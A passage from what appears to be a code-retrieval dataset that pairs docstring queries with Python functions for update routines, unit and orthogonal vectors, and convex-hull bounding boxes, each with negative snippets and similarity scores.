update_angles(self):\n joint_values = []\n for i in self.joint_names:\n joint_values.append(self.joint_angles[i])\n \n try:\n answer = self.update_arm_angles(joint_values)\n except rospy.ServiceException as e:\n rospy.logwarn('Service call failed for: {0}'.format(e))\n\n #service_call = # self.update_joints(joint_values)", "def port_update(self, context, **kwargs):\n self._refresh_bridge_mappings_to_neutron()", "def update_geometries(self, geo_nodes, attribute_data, alembic_path):\n mc.delete([\n mc.listRelatives(node, parent=True)[0]\n for node in geo_nodes\n ])\n geo_nodes = self.import_alembic(alembic_path)\n self.set_alembic_effect_attributes(geo_nodes, attribute_data)", "def update_radius(DirectoryId=None, RadiusSettings=None):\n pass", "def connect_rig():\n\n # Connect hooks to parent\n connect_hooks()\n\n # Create spaces\n create_spaces()\n\n # Loack and load attrs values and keyable settings\n '''\n # Done\n if mc.objExists('visibility_CTL'):\n mc.setAttr('visibility_CTL.allCtrlsVis', 1)\n mc.setAttr('visibility_CTL.offsetCtrlsVis', 0)\n mc.setAttr('visibility_CTL.jointsSelectable', 0)\n mc.setAttr('visibility_CTL.modelSelectable', 0)\n mc.setAttr('visibility_CTL.jointsVis', 0)\n mc.setAttr('visibility_CTL.modelVis', 1)\n '''\n\n 
mc.select(cl=1)\n print '\\nFinalized rig.'", "def update(self):\n self.backbone_module.update()\n mx.nd.waitall()", "def refresh():\n return __apf_cmd(\"-e\")", "def update(self, system, environment_input):\n pass", "def syncrepl_refreshdone(self):\n pass", "def upgrade_packages():\n\n require('environment', provided_by=env.environments)\n system.update_apt_sources()\n system.upgrade_apt_packages()", "def update_versions(self, reference_resolution):\n raise NotImplementedError(\"update_versions is not implemented\")", "def _update_binding_after_export(self, map_record, sync_data=None, compare_data=None):\n self.binder.bind(self.getresponse_id, self.binding_id,\n sync_data=sync_data, compare_data=compare_data)", "def test_ipam_rirs_update(self):\n pass", "def snap_refresh(packages, *flags):\n if type(packages) is not list:\n packages = [packages]\n\n flags = list(flags)\n\n message = 'Refreshing snap(s) \"%s\"' % ', '.join(packages)\n if flags:\n message += ' with options \"%s\"' % ', '.join(flags)\n\n log(message, level='INFO')\n return _snap_exec(['refresh'] + flags + packages)", "def reload():\n if not _status_apf():\n return __apf_cmd(\"-r\")", "def update_go_deps(self):\n self.go_version()\n env = self.m.step.get_from_context('env', {})\n env.update(self.go_env)\n with self.m.step.context({'env': env}):\n self.m.run.with_retry(\n self.m.step,\n 'update go pkgs',\n UPDATE_GO_ATTEMPTS,\n cmd=[self.go_exe, 'get', '-u', '-t', '%s/...' % INFRA_GO_PKG])", "async def reload_platform(self) -> None:", "def update(self, paths):\n raise NotImplementedError", "def update(appname, use_appimageupdate=True):\n z = Zap(appname)\n z.update(use_appimageupdate=use_appimageupdate)", "def exchange_solution(self):\n for ss in self.solvers:\n ss.register_solution()\n\n if self.has_amr:\n self.tioga.data_update_amr()\n else:\n raise NotImplementedError(\"Invalid overset exchange\")\n\n for ss in self.solvers:\n ss.update_solution()", "def update():\n require('PROJECT_NAME')\n\n with cd(utils.home('apps', env.PROJECT_NAME)):\n run('hg pull')\n run('hg up')", "def update(self):\n with settings(user=self.serviceUser):\n self.venv.create()\n\n self.venv.install_twisted()\n self.venv.install(\" \".join(\"\"\"\n psycopg2==2.7.5\n pygments==2.2.0\n spambayes==1.1b3\n trac==1.2.2\n trac-github==2.3\n requests_oauthlib==1.0.0\n svn+https://svn.edgewall.org/repos/trac/plugins/1.2/spam-filter@15310\n git+https://github.com/twisted-infra/twisted-trac-plugins.git\n \"\"\".split()))\n\n # This is txacme v2 but is not yet released.\n # Should be replaced on we have txacme v2.\n # See https://github.com/twisted/txacme/pull/158\n self.venv.install(\n \"--index=https://pypi.chevah.com/simple txacme==1.0.0.chevah4\")\n\n run('mkdir -p ' + self.configDir)\n put(os.path.dirname(__file__) + '/*', self.configDir,\n mirror_local_mode=True)", "def refresh_well_registry_mv(connect):\n cursor = connect.cursor()\n cursor.execute(\"begin dbms_mview.refresh('GW_DATA_PORTAL.WELL_REGISTRY_MV'); end;\")" ]
[ "0.5909581", "0.52897483", "0.5182346", "0.5049008", "0.50418323", "0.487255", "0.48481926", "0.48071972", "0.48067838", "0.48017973", "0.47946712", "0.47891673", "0.4787338", "0.47767738", "0.47652295", "0.47616255", "0.47590637", "0.47561038", "0.47273707", "0.47131407", "0.4707602", "0.4694417", "0.4686729", "0.46768755", "0.46719193", "0.4668742", "0.4649456", "0.46476108", "0.4646367", "0.4643261" ]
0.63963205
0
Given two points pt0 and pt1, return a unit vector that points in the direction from pt0 to pt1. Returns
def _unit_vector(pt0, pt1):
    dis_0_to_1 = sqrt((pt0[0] - pt1[0])**2 + (pt0[1] - pt1[1])**2)
    return (pt1[0] - pt0[0]) / dis_0_to_1, \
           (pt1[1] - pt0[1]) / dis_0_to_1
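# Example (hypothetical): _unit_vector((0, 0), (3, 4)) -> (0.6, 0.8),
# since the distance between the points is 5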
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dir_vector(p1: Vec2, p2: Vec2) -> Vec2:\n return Vec2(p2.x - p1.x, p2.y - p1.y)", "def vector(p0, p1):\n a = p1[0] - p0[0]\n b = p1[1] - p0[1]\n return (a, b)", "def direction(point0, point1):\n d = [0, 0, 0]\n vector = [point1[0] - point0[0], point1[1] - point0[1]]\n d[1] = math.atan2(vector[1], vector[0])\n while d[1] <= -np.pi / 2:\n d[1] += np.pi\n return d", "def from_pts(one, two):\n\t\treturn Vec2(two[0] - one[0], two[1] - one[1])", "def dirVector(self,p1,p2):\n v=p2-p1\n l=v.Length\n return self.toMatrix(v)/l", "def point_to_point(p1: Vec2, p2: Vec2):\n return length(dir_vector(p1, p2))", "def point_to_point_vector(point0, point1, out=None):\n point0 = np.reshape(point0, (2, -1))\n point1 = np.reshape(point1, (2, -1))\n\n if out is None:\n return np.subtract(point1, point0)\n else:\n return np.subtract(point1, point0, out=out)", "def create_vector(point_1, point_2):\n return tuple([point_2[0] - point_1[0], point_2[1] - point_1[1]])", "def nor_vector(p1: Vec2, p2: Vec2) -> Vec2:\n return Vec2(p1.y - p2.y, p2.x - p1.x)", "def qpDist(pt0, pt1):\n a = hou.Vector2(pt0.x(), pt0.y())\n b = hou.Vector2(pt1.x(), pt1.y())\n return a.distanceTo(b)", "def get_direction(pt1, pt2):\n dx, dy = pt2[0]-pt1[0], pt2[1]-pt1[1]\n if abs(dx)<=TOL and dy>0:\n return \"NORTH\"\n elif abs(dy)<=TOL and dx<0:\n return \"WEST\"\n elif abs(dx)<=TOL and dy<0:\n return \"SOUTH\"\n else:\n return \"EAST\"", "def getVec(pos1, pos2):\n\n x1 = pos2[0] - pos1[0]\n y1 = pos2[1] - pos1[1]\n gcd1 = math.gcd(abs(x1), abs(y1))\n\n if gcd1 > 0:\n x = x1//gcd1\n else:\n x = x1\n if gcd1 > 0:\n y = y1//gcd1\n else:\n y = y1\n\n return x, y", "def dist(pt1, pt2):\n return np.sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2)", "def find_perpendicular_vector(vt):\n x, y = vt\n return np.array([y, -x])", "def vector_between_points(a, b):\n vector_1 = Vector(*a)\n vector_2 = Vector(*b)\n return vector_1 - vector_2", "def translation_separation(t1: np.ndarray, t2: np.ndarray) -> float:\n return np.linalg.norm(t1 - t2)", "def point_to_line_signed(p: Vec2, p0: Vec2, p1: Vec2):\n return cross(norm(nor_vector(p0, p1)), dir_vector(p, p0))", "def distance(pt1, pt2):\n return (pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2", "def _relative_velocity(vel1, vel2):\n return [ v1 - v2 for (v1, v2) in zip(vel1, vel2)]", "def pt_dist(p1, p2):\n return math.sqrt(abs((p1[0] - p2[0])**2) + abs((p1[1] - p2[1])**2))", "def TwoPoints(self, p1, p2):\n\n p1 = base.getvector(p1)\n if len(p1) == 2:\n p1 = np.r_[p1, 1]\n p2 = base.getvector(p2)\n if len(p2) == 2:\n p2 = np.r_[p2, 1]\n\n return Line2(np.cross(p1, p2))", "def get_exact_angle(pt1, pt2):\n dx, dy = pt2[0]-pt1[0], pt2[1]-pt1[1]\n return math.atan2(dy,dx)", "def find_direction_vector(line):\n pt1, pt2 = line\n pt1 = np.array(pt1).reshape(2,)\n pt2 = np.array(pt2).reshape(2,)\n direct = pt2 - pt1\n direct_norm = normalize(direct)\n return direct_norm", "def _mid(pt1, pt2):\n (x0, y0), (x1, y1) = pt1, pt2\n return 0.5 * (x0 + x1), 0.5 * (y0 + y1)", "def getVector(c1, c2):\n return [c1[0] - c2[0], c1[1] - c2[1], c1[2] - c2[2]]", "def normal(point_one, point_two):\n return numpy.array([point_one[1] - point_two[1], point_two[0] - point_one[0]])", "def d2(x0,y0,x1,y1):\n return (x0-x1)*(x0-x1) + (y0-y1)*(y0-y1)", "def dist(pnt1, pnt2):\n return ((pnt2[0] - pnt1[0])**2 + (pnt2[1] - pnt1[1])**2 + (pnt2[2] - pnt1[2])**2)**0.5", "def get_distance(pt1,pt2):\r\n x1 = pt1[1]\r\n y1 = pt1[0]\r\n x2 = pt2[1]\r\n y2 = pt2[0]\r\n d = np.sqrt((x2-x1)**2 + (y2-y1)**2)\r\n return d", "def normal(point0: Point, 
point1: Point) -> Tuple[Point, float]:\n mid: Point = ((point0[0] + point1[0]) / 2, (point0[1] + point1[1]) / 2)\n v: Vector2 = (point1[0] - point0[0], point1[1] - point0[1])\n normal: Vector2 = (-v[1], v[0])\n\n angle = math.atan(v[1] / v[0])\n angleNorm = math.atan(normal[1] / normal[0])\n assert(abs(abs(angle - angleNorm) - math.pi / 2) < 0.001)\n\n x = [mid[0], mid[0] + normal[0]]\n y = [mid[1], mid[1] + normal[1]]\n plt.plot(x, y, \":\")\n\n return (mid, angleNorm)" ]
[ "0.7350742", "0.7088152", "0.7051899", "0.6943673", "0.68375623", "0.6814168", "0.6791304", "0.6746292", "0.6693085", "0.64756083", "0.64739174", "0.64329237", "0.6425584", "0.6419102", "0.6410274", "0.6389862", "0.63404804", "0.6337205", "0.6286878", "0.6248634", "0.6230512", "0.6224488", "0.62206066", "0.6219337", "0.61864257", "0.6184325", "0.6151214", "0.61508095", "0.6140133", "0.6133391" ]
0.8154963
0
Given a vector, returns an orthogonal/perpendicular vector of equal length. Returns
def _orthogonal_vector(vector):
    return -1 * vector[1], vector[0]
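# Example (hypothetical): _orthogonal_vector((3, 4)) -> (-4, 3),
# i.e. the input rotated 90 degrees counter-clockwise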
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_perpendicular2d(vector):\n if vector[1] == 0:\n return np.asarray([0.,1.])\n v2_0 = 1.0\n v2_1 = -(vector[0]/vector[1])\n v2 = np.asarray([v2_0, v2_1])\n return v2 / np.linalg.norm(v2)", "def perpendicular_vector(v):\n if v[1] == 0 and v[2] == 0:\n if v[0] == 0:\n raise ValueError(\"zero vector\")\n else:\n return np.cross(v, [0, 1, 0])\n return np.cross(v, [1, 0, 0])", "def perpendicular_axis(vec):\n axis = vec.rotate(-math.pi / 2) # rotate vector -90 degrees\n axis = axis.norm() # turn axis vector into unit vector\n return axis", "def perpendicularTo(self, vector):\n perpendicular = self.subtractVector(self.parallelTo(vector))\n return perpendicular", "def orthogonal_to(vector: ModelParameters) -> ModelParameters:\n new_vector = rand_u_like(vector)\n new_vector = new_vector - new_vector.dot(vector) * vector / math.pow(vector.model_norm(2), 2)\n return new_vector", "def orthogonal(v):\n return np.array([-v[1], v[0]])", "def vector_perp(v):\n assert len(v) == 2\n x, y = v\n return Vector(-y, x)", "def get_orthogonal_vec2d(vec):\n ortho = np.array([-vec[1], vec[0]])\n return ortho", "def find_perpendicular_vector(vt):\n x, y = vt\n return np.array([y, -x])", "def test_perpendicular_to_vector():\n assert_almost_equal(pr.angle_between_vectors(\n pr.unitx, pr.perpendicular_to_vector(pr.unitx)), np.pi / 2.0)\n assert_almost_equal(pr.angle_between_vectors(\n pr.unity, pr.perpendicular_to_vector(pr.unity)), np.pi / 2.0)\n assert_almost_equal(pr.angle_between_vectors(\n pr.unitz, pr.perpendicular_to_vector(pr.unitz)), np.pi / 2.0)\n random_state = np.random.RandomState(0)\n for _ in range(5):\n a = pr.norm_vector(pr.random_vector(random_state))\n assert_almost_equal(pr.angle_between_vectors(\n a, pr.perpendicular_to_vector(a)), np.pi / 2.0)\n b = a - np.array([a[0], 0.0, 0.0])\n assert_almost_equal(pr.angle_between_vectors(\n b, pr.perpendicular_to_vector(b)), np.pi / 2.0)\n c = a - np.array([0.0, a[1], 0.0])\n assert_almost_equal(pr.angle_between_vectors(\n c, pr.perpendicular_to_vector(c)), np.pi / 2.0)\n d = a - np.array([0.0, 0.0, a[2]])\n assert_almost_equal(pr.angle_between_vectors(\n d, pr.perpendicular_to_vector(d)), np.pi / 2.0)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\r\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\r\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\r\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n assert(vector != [0,0])\n return vector / np.linalg.norm(vector)", "def getOnePerpendicularVector(self):\n vector_y = Vector(0, 1, 0)\n vector_z = Vector(0, 0, 1)\n\n if self.getNormalizedVector() == vector_z:\n return vector_y\n\n vector_perpendicular = vector_z.perpendicularTo(self)\n 
vector_perpendicular = vector_perpendicular.getNormalizedVector()\n\n return vector_perpendicular", "def unit_vector(self, vector):\n return vector / np.linalg.norm(vector)", "def perpendicular(self):\n return tuple.__new__(Vec2, (-self[1], self[0]))", "def get_unit_vector(self, vector):\n return vector / la.norm(vector)" ]
[ "0.8108887", "0.8046012", "0.80115205", "0.8010986", "0.79765224", "0.77215797", "0.75200254", "0.73142374", "0.7283013", "0.7026917", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.68313277", "0.68313277", "0.68313277", "0.68290037", "0.68119675", "0.67980814", "0.6733019", "0.6714627", "0.66902834" ]
0.8325588
0
Given an index location in an array and a convex hull, it gets two points hull[index] and hull[index+1]. From these two points, it returns a named tuple that mainly contains the area of the box that bounds the hull. This bounding box orientation is the same as the orientation of the line formed by the points hull[index] and hull[index+1]. Returns
def _bounding_area(index, hull):
    unit_vector_p = _unit_vector(hull[index], hull[index + 1])
    unit_vector_o = _orthogonal_vector(unit_vector_p)

    dis_p = tuple(np.dot(unit_vector_p, pt) for pt in hull)
    dis_o = tuple(np.dot(unit_vector_o, pt) for pt in hull)

    min_p = min(dis_p)
    min_o = min(dis_o)
    len_p = max(dis_p) - min_p
    len_o = max(dis_o) - min_o

    return {'area': len_p * len_o,
            'length_parallel': len_p,
            'length_orthogonal': len_o,
            'rectangle_center': (min_p + len_p / 2, min_o + len_o / 2),
            'unit_vector': unit_vector_p,
            }
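# Example (hypothetical): for the unit-square hull
# [(0, 0), (1, 0), (1, 1), (0, 1), (0, 0)] with index=0, this returns
# {'area': 1, 'length_parallel': 1, 'length_orthogonal': 1,
#  'rectangle_center': (0.5, 0.5), 'unit_vector': (1.0, 0.0)}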
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def minimum_area_OBB(xy):\n # get convex hull\n hull = quickhull2d(xy)\n nh = len(hull)\n\n # handle special cases\n if nh < 1:\n return (numpy.zeros(2), numpy.zeros(2), numpy.eye(2))\n elif nh == 1:\n return (xy[hull[0]], numpy.zeros(2), numpy.eye(2))\n elif nh == 2:\n center = 0.5*numpy.sum(xy[hull], axis=0)\n vec = xy[hull[1]] - xy[hull[0]]\n ranges = numpy.array([\n 0.5*numpy.hypot(vec[0], vec[1]),\n 0\n ])\n axes = rotation_matrix2d(-numpy.arctan2(vec[1], vec[0]))\n return (center, ranges, axes)\n\n xyh = xy[hull]\n area = 1e20\n for i in range(nh):\n # i-th edge of the convex hull\n vec = xyh[(i+1)%nh] - xyh[i]\n\n # apply rotation that makes that edge parallel to the x-axis\n rot = rotation_matrix2d(numpy.arctan2(vec[1], vec[0]))\n xyrot = matmul(rot, xyh.T).T\n\n # xy ranges of the rotated convex hull\n mn = numpy.amin(xyrot, axis=0)\n mx = numpy.amax(xyrot, axis=0)\n ranges_tmp = mx - mn\n area_tmp = ranges_tmp[0]*ranges_tmp[1]\n \n if area_tmp < area:\n area = area_tmp\n # inverse rotation\n rot = rot.T\n center = matvecprod(rot, 0.5*(mn + mx))\n if ranges_tmp[1] > ranges_tmp[0]:\n ranges = 0.5*ranges_tmp[[1,0]]\n axes = numpy.zeros((2,2))\n axes[:,0] = rot[:,1]\n axes[:,1] = -rot[:,0]\n else:\n ranges = 0.5*ranges_tmp\n axes = rot\n return (center, ranges, axes)", "def test_convexHullFacetArea(self):\n try:\n import pyhull\n except ImportError:\n self.skipTest(\"Pyhull (optional) is not available so cannot compute facet area.\")\n \n # make points\n N = 8\n pts = [0, 0, 0,\n 3, 0, 0,\n 0, 3, 0,\n 0, 0, 3,\n 3, 3, 0,\n 0, 3, 3,\n 3, 0, 3,\n 3, 3, 3]\n \n # calc volume\n volume, facetArea = clusters.findConvexHullVolume(N, pts)\n \n self.assertAlmostEqual(facetArea, 54.0)", "def get_area_box(contours_points):\n rect = cv2.minAreaRect(np.array(contours_points))\n box = cv2.cv.BoxPoints(rect)\n box = np.array(box)\n return map(tuple, box)", "def area(boxes):\n y_min, x_min, y_max, x_max = np.split(boxes, 4, axis=-1)\n return np.squeeze((y_max - y_min) * (x_max - x_min), [1])", "def get_face_areas(self, idx=-1):\n if idx >= len(self.faces):\n raise IndexError\n if idx >= 0:\n v1, v2, v3 = self.faces[idx]\n v1, v2, v3 = self.vertices[v1], self.vertices[v2], self.vertices[v3]\n a = np.linalg.norm(v1 - v2)\n b = np.linalg.norm(v1 - v3)\n c = np.linalg.norm(v2 - v3)\n s = (a + b + c) / 2\n area = np.sqrt(s * (s - a) * (s - b) * (s - c))\n return area\n else:\n v1, v2, v3 = self.faces[:, 0], self.faces[:, 1], self.faces[:, 2]\n v1, v2, v3 = self.vertices[v1], self.vertices[v2], self.vertices[v3]\n a = np.linalg.norm(v1 - v2, axis=1)\n b = np.linalg.norm(v1 - v3, axis=1)\n c = np.linalg.norm(v2 - v3, axis=1)\n s = (a + b + c) / 2\n area = np.sqrt(s * (s - a) * (s - b) * (s - c))\n return area", "def boundingBoxArea(box):\n return (box[2] - box[0] + 1) * (box[3] - box[1] + 1)", "def area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def get_bounding_box(self):\n if len(self.polygons) == 0:\n return None\n return numpy.array(((min(pts[:, 0].min() for pts in self.polygons),\n min(pts[:, 1].min() for pts in self.polygons)),\n (max(pts[:, 0].max() for pts in self.polygons),\n max(pts[:, 1].max() for pts in self.polygons))))", "def polygon_area(ppath): # pragma: no cover\n v_ = ppath.vertices\n if len(v_) < 3:\n return 0.0\n x_ = v_[:, 1] - v_[:, 1].mean()\n y_ = v_[:, 0] - v_[:, 0].mean()\n correction = x_[-1] * y_[0] - y_[-1] * x_[0]\n main_area = np.dot(x_[:-1], y_[1:]) - np.dot(y_[:-1], x_[1:])\n return 0.5 * np.abs(main_area + correction)", "def 
area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def boundingBox(self):\n y_max = np.max(self.points[:,0])\n x_max = np.max(self.points[:,1])\n y_min = np.min(self.points[:,0])\n x_min = np.min(self.points[:,1])\n \n return ((x_max, y_max), (x_min, y_min))", "def polygon_area(x, y):\n return 0.5 * np.abs(np.dot(x, np.roll(y, 1)) - np.dot(y, np.roll(x, 1)))", "def _get_area_polygon(points_x, points_z):\n area = 0\n j = len(points_x) - 1\n for i in range(len(points_x)):\n area = area + (\n points_x[j] + points_x[i]\n ) * (points_z[j] - points_z[i])\n j = i\n return np.abs(area / 2)", "def calcFaceAreas(x,y,z):\n (nLonP1, nLatP1) = x.shape\n (nLon, nLat) = (nLonP1-1, nLatP1-1)\n\n area = numpy.zeros((nLon, nLat))\n\n for i in range(nLon):\n for j in range(nLat):\n left = distance( (x[i,j], y[i,j], z[i,j]), (x[i,j+1], y[i,j+1], z[i,j+1]) )\n right = distance( (x[i+1,j], y[i+1,j], z[i+1,j]), (x[i+1,j+1], y[i+1,j+1], z[i+1,j+1]) )\n top = distance( (x[i,j+1], y[i,j+1], z[i,j+1]), (x[i+1,j+1], y[i+1,j+1], z[i+1,j+1]) )\n bot = distance( (x[i,j], y[i,j], z[i,j]), (x[i+1,j], y[i+1,j], z[i+1,j]) )\n \n area[i,j] = 0.5*(left+right) * 0.5*(top+bot)\n\n return area", "def _area(bounds):\n return (bounds[0, 1] - bounds[0, 0]) * (bounds[1, 1] - bounds[1, 0])", "def convex_hull_area( contours, debug= False ):\r\n ret_areas = []\r\n ret_hulls = []\r\n for c in contours:\r\n hull = cv2.convexHull( c )\r\n area = cv2.contourArea( hull )\r\n ret_areas.append( area )\r\n ret_hulls.append( hull )\r\n if( debug ):\r\n print( \"Hull area: {0}\".format( area ) )\r\n\r\n return ( ret_areas, ret_hulls )", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull \n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list. \n return lower[:-1] + upper[:-1]", "def get_referenced_floor_area() -> np.ndarray:\n\n return envelope.get_referenced_floor_area()", "def box_area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def box_area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross\n # product. 
Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n return lower, upper", "def extract_area(data,box):\n if box is None or box[0] is None or box[1] is None or box[1][0] - box[0][0] == 0 or box[1][1] - box[0][1] == 0:\n box = ((0,0),(10,10));\n area = ut.extract_area(data['frame'],*box,data['uc'],256);\n return area;", "def sort_hull(hull):\n max_unproc_edge = hull[np.lexsort((-hull.length, hull.is_processed))][0]\n idx = np.where(hull == max_unproc_edge)[0][0]\n\n # shift convex hull to have the longest edge at the beginning\n hull = np.roll(hull, -idx, axis=0)\n\n return hull, max_unproc_edge.length", "def bounding_box(alpha):\n assert alpha.ndim == 2\n\n # Take the bounding box of the support, with a certain threshold.\n #print(\"Using alpha\", self.use_alpha, \"support\", self.support)\n supp_axs = [alpha.max(axis=1-i) for i in range(2)]\n\n th = 0.5 \n # Check first and last value of that threshold\n bb = [np.where(supp_axs[i] > th)[0][[0,-1]] for i in range(2)]\n\n # This bb looks like [(x0, x1), (y0, y1)], when we want it as (x0, y0, x1, y1)\n #psize = self.settings['subsample_size']\n #ret = (bb[0][0]/psize[0], bb[1][0]/psize[1], bb[0][1]/psize[0], bb[1][1]/psize[1])\n\n return (bb[0][0], bb[1][0], bb[0][1], bb[1][1])", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. 
z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n cont = 1\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n print(\"antes \"), print(cont), print(lower)\n lower.pop()\n print(\"despues \"),print(lower)\n cont += 1\n lower.append(p)\n xlower ,ylower = getlists(lower)\n plt.plot(xlower,ylower,color=\"yellow\")\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n print(upper)\n print(\"hello2 \")\n print(cross((2,0),(2,4),(2.5,3)))\n\n xupper ,yupper = getlists(upper)\n plt.plot(xupper,yupper,color=\"blue\")\n\n\n return lower[:-1] + upper[:-1]", "def area(self):\n if len(self.exterior) < 3:\n raise Exception(\"Cannot compute the polygon's area because it contains less than three points.\")\n poly = self.to_shapely_polygon()\n return poly.area", "def _convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list.\n return lower[:-1] + upper[:-1]", "def shape_from_bounding_box(bounding_box):\n size = []\n for axs in bounding_box:\n delta = axs[1] - axs[0]\n size.append(int(delta + 0.5))\n return tuple(reversed(size))", "def polygon_area_2d(polygon):\r\n return geometry.gmPolygonArea(polygon)", "def computePointSectionArea(self,wingIndex,segmentIndex,eta,xsi):\n # tigl.wingGetUpperPoint(wingIndex, segmentIndex, eta -> y, xsi->x)\n # WARNING there is a slight difference in the area computed with this\n # method ans CPACSCREATOR. 
At the moment it is undetermined who is more\n # accurate.\n N = 20\n xsi1 = np.linspace(0,1,N)\n upper = np.empty((N,3))\n lower = np.empty((N,3))\n\n\n # t = np.max(np.abs(upper[:][2] - lower[:][2]))\n \n for i in range(N):\n U = self.tigl.wingGetUpperPoint(wingIndex,segmentIndex,eta,xsi1[i])\n L = self.tigl.wingGetLowerPoint(wingIndex,segmentIndex,eta,xsi1[i])\n upper[i] = np.array(U)\n lower[i] = np.array(L)\n v1 = upper[0]-upper[-1]\n v2 = upper[7] - lower[7]\n c = np.abs(upper[0][0] - upper[-1][0])\n t = np.max(np.abs(upper[:][2] - lower[:][2]))\n print(c)\n area = c*0.1*t\n # sys.exit()\n # v1xv2 = np.cross(v1,v2)\n # upper = np.flip(upper,axis=0)\n # wingSectionPoints = np.concatenate((upper, lower))\n # ey_0 = np.array([0,1,0])\n # e_1 = v1xv2\n # # Computes the cross prodct\n # cross = np.cross(ey_0,e_1)\n # normCross = np.linalg.norm(cross)\n # cross = cross/normCross\n # if normCross < 1e-8:\n # # No need to rotate\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = ConvexHull(wingSectionPoints)\n # area = hull.volume\n # else:\n # ab = inner1d(ey_0,e_1)\n # a = np.linalg.norm(ey_0)\n # b = np.linalg.norm(e_1)\n # angle = np.arccos(ab / (a*b))\n # logger.debug(\"angle: \"+str(angle))\n # quat = angle*cross\n # r = R.from_rotvec(quat)\n # # Deletes the y column since the Convex hull will struggle with\n # # a 3d plane otherwise\n # wingSectionPoints = r.apply(wingSectionPoints)\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = 